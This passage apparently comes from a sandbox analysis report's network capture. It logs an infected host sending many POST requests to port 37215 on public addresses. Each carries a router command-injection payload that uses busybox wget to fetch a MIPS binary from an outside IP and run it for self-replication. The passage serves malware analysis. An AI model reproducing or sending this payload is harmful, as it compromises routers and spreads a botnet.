                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1045192.168.2.233341041.211.66.6637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.288258076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1046192.168.2.234135071.22.40.22337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.288307905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1047192.168.2.235714641.124.253.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.288311958 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1048192.168.2.2356668197.2.143.10837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.288386106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1049192.168.2.2350616197.95.121.13237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.288460016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1050192.168.2.233930841.68.114.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.294646978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1051192.168.2.2334800157.4.20.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.294646978 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1052192.168.2.2359414157.51.75.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.294670105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1053192.168.2.235293824.130.118.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.294673920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1054192.168.2.2347694197.79.43.19037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.294758081 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1055192.168.2.2347642157.190.218.25337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.294768095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
